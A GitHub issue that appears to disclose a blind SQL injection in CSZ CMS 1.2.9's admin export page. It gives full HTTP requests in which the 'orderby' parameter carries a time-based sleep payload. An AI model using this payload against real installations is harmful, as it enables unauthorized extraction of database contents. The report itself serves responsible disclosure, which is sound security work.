You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Description:
I found Blind SQL Injection vulnerability in your CMS (version_1.2.9) "export" page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application's database server.
"fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection use this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter. You request data will be
Description:
I found Blind SQL Injection vulnerability in your CMS (version_1.2.9) "export" page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application's database server.
CMS Version:
1.2.9
Affected URL:
http://127.0.0.1/admin/export
Steps to Reproduce:
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: _ga=GA1.1.2106075763.1616578884; _pk_id.39.dc78=a6fc2902298b2ea4.1616578885.2.1616584112.1616584112.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
Proof of Concept:
You can see the Proof of Concept. which I've attached a video to confirm the vulnerability.
Blind.SQL.Injection.mp4
Impact:
An attacker could extract information from database.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
BugsBD Limited
https://www.linkedin.com/in/rahadchowdhury/
The text was updated successfully, but these errors were encountered: